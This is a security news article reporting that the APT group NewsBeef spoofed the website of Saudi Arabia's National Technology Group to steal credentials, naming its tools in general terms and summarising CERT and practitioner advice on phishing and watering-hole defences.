India Insights with Geetha Nandikotkur

Data Breach , Fraud , Phishing

Hackers Targeted Saudi Arabia's National Technology Group 'NewsBeef' APT Group Spoofed Website in Attempt to Steal Critical Data
Hackers Targeted Saudi Arabia's National Technology Group

The website of Saudi-based National Technology Group, an IT services organization, was spoofed by a hacker group that attempts to steal credentials and gain access to critical corporate information, according to a report by CERT of Saudi Arabia.

See Also: How the New World of Digital Banking is Transforming Fraud Detection

The report, shared with Information Security Media Group by a security practitioner who requested anonymity, claims that on Jan. 23, an advanced persistent threat group known as "NewsBeef" spoofed the site using a typo-squatting domain (see: Researchers See Links Between Iran and Mac Malware).

The best way to mitigate the risk of such attacks is to educate teams about the dangers of spear-phishing, social engineering and visiting spoofed websites, security experts say. 

The NewsBeef group seems to have recently deployed a new toolset that includes malicious macro-enabled Office documents, a Powershell based tool suite called "Powersploit" and the Pupy backdoor, according to the report. These tools are used to penetrate into network systems. NTG is just one of several websites NewsBeef has targeted, according to the CERT report.

Officials of CERT-SA and NTG did not respond to ISMG's requests for comment.

Phishing Campaign

The report states that the NewsBeef group primarily uses spear-phishing and watering hole attacks against high-profile targets.

Several security practitioners tell ISMG that NewsBeef has waged a complex, multiyear cyber espionage campaign that exploits social media and takes a low-tech approach to avoid security defenses. The goal of the campaign is to steer victims to spoofed or compromised websites to steal user credentials in an effort to access critical assets of an organization.

Qatar based Edward Ayman Ganom, CISO at The Commercial Bank, notes that the attackers use the Browser Exploitation Framework, or BeEF, penetration testing suite that focuses on the vulnerabilities in the web browser.

These attacks usually lead to data loss and stealing of credentials. The hacker group has been using BeEF to track visitors of websites they've compromised, including the NTG website, via flaws in content management systems, according to the CERT report.

Samir Pawaskar , a security professional with a leading policy and risk team, says that the Newsbeef attackers have monitored visitor profiles and deployed evercookies, a Java-based application for persistent tracking, to compromise identity and gain access to assets and steam personal information from website visitors.

The CERT report states that spear-phishing and watering hole attacks targeting any organizations' employees and customers are highly effective and may lead to identity/credential theft and/or system compromise, which enables access to the target machine as well as organizations' networks.

Remediation Methods

The best way to mitigate the risk of such attacks is to educate teams about the dangers of spear-phishing, social engineering and visiting spoofed websites, security experts say.

CERT's report recommends strict adherence to UAE's information assurance standards. Key remediation methods should include:

  • Ensure all devices get the latest firmware and software updates.
  • Monitor network and host-based traffic for signs of anomalous or suspicious activity.
  • Investigate network/host traffic containing the indicators of compromise.

Security practitioners also stress the need to implement a multilayer defense-in-depth approach.

Pawaskar recommends that organizations check that they have adequate infrastructure in place to monitor their systems and respond malicious traffic is detected.

Another way to mitigate attacks is to upgrade browsers more frequently and block social networks.

Ganom says training and awareness for senior executives about the risks of social engineering schemes is also important.

In addition, a key element in securing networks or websites is good threat intelligence sharing standards or practices. CERTs across the region need to encourage organizations to share information about new threats so companies can take appropriate mitigation steps.



About the Author

Geetha Nandikotkur

Geetha Nandikotkur

Managing Editor, Asia & the Middle East, ISMG

Nandikotkur is an award-winning journalist with over 20 years' experience in newspapers, audio-visual media, magazines and research. She has an understanding of technology and business journalism, and has moderated several roundtables and conferences, in addition to leading mentoring programs for the IT community. Prior to joining ISMG, Nandikotkur worked for 9.9 Media as a Group Editor for CIO & Leader, IT Next and CSO Forum.




Around the Network